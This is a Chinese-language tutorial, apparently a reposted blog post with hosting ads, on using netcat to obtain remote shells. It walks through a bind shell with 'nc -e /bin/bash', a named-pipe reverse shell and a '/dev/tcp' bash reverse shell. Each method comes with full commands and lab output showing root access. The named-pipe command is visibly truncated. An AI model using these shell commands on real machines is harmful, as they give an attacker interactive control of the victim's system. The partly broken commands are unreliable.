nc幫助文檔上面說的是TCP/IP協(xié)議中的swiss army knife，是一個使用tcp或udp協(xié)議通過網(wǎng)絡連接來讀寫數(shù)據(jù)的一個簡單的多功能的工具！在***中經(jīng)常用于反彈shell，用于交互式執(zhí)行shell，或者用于提權！

創(chuàng)新互聯(lián)建站專業(yè)為企業(yè)提供南澗網(wǎng)站建設、南澗做網(wǎng)站、南澗網(wǎng)站設計、南澗網(wǎng)站制作等企業(yè)網(wǎng)站建設、網(wǎng)頁設計與制作、南澗企業(yè)網(wǎng)站模板建站服務，10余年南澗做網(wǎng)站經(jīng)驗，不只是建網(wǎng)站，更提供有價值的思路和整體網(wǎng)絡服務。

    基本使用語法：

nc 選項 IP port

   基本參數(shù)說明：

-l：監(jiān)聽端口，監(jiān)聽入站信息
-p：后跟本地端口號
-v：顯示端口的信息，多數(shù)人喜歡使用-vv，但是我用了沒看到有什么區(qū)別

    第一種方法：

    第一種的話需要目標主機直接就是外網(wǎng)獨立ip才可以，如果是通過內網(wǎng)映射出來的，就不適用這個方法了！

    目標主機：

nc -lvp 2222 -e /bin/bash

root@kali:~# nc -lvp 2222 -e /bin/bash
listening on [any] 2222 ...

    ***主機：

nc 目標機IP 2222

F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc 192.168.5.128 2222

    此時我們查看目標主機：

root@kali:~# nc -lvp 2222 -e /bin/bash
listening on [any] 2222 ...
192.168.5.1: inverse host lookup failed: Unknown host
connect to [192.168.5.128] from (UNKNOWN) [192.168.5.1] 14960

    此時我們在***機就可以執(zhí)行命令了！

F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc 192.168.5.128 2222
whoami
root
uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

    第二種方法：

    第二種方法，需要我們有獨立外網(wǎng)ip，用于監(jiān)聽返回來的shell！

    目標主機：

root@kali:~# mknod /tmp/backpipe p
root@kali:~# /bin/sh 0/tmp/backpipe

    ***主機：

F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc -lvp 2222
lstn on [any] 2222 ..
192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA
connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53404: NO_DATA
whoami
root
uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux

    第三種：

    第三種方法需要我們有獨立的外網(wǎng)ip，用于接收shell！

    目標主機：

root@kali:~# bash -i >& /dev/tcp/192.168.5.1/2222 0>&1

    ***主機：

F:\\eth20-CTF-Toolkits\\CTF工具包\\連接工具>nc -lvp 2222
lstn on [any] 2222 ..
192.168.5.128: reverse hst chk phailed: h_errno 11004: NO_DATA
connect to [192.168.5.1] from (UNKNOWN) [192.168.5.128] 53418: NO_DATA
root@kali:~# uname -a
uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:~# whoami
whoami
root
root@kali:~#exit

另外有需要云服務器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內外云服務器15元起步，三天無理由+7*72小時售后在線，公司持有idc許可證，提供“云服務器、裸金屬服務器、高防服務器、香港服務器、美國服務器、虛擬主機、免備案服務器”等云主機租用服務以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡單易用、服務可用性高、性價比高”等特點與優(yōu)勢，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應用場景需求。

文章題目：linux命令——nc-創(chuàng)新互聯(lián)
分享路徑：http://weahome.cn/article/dshcis.html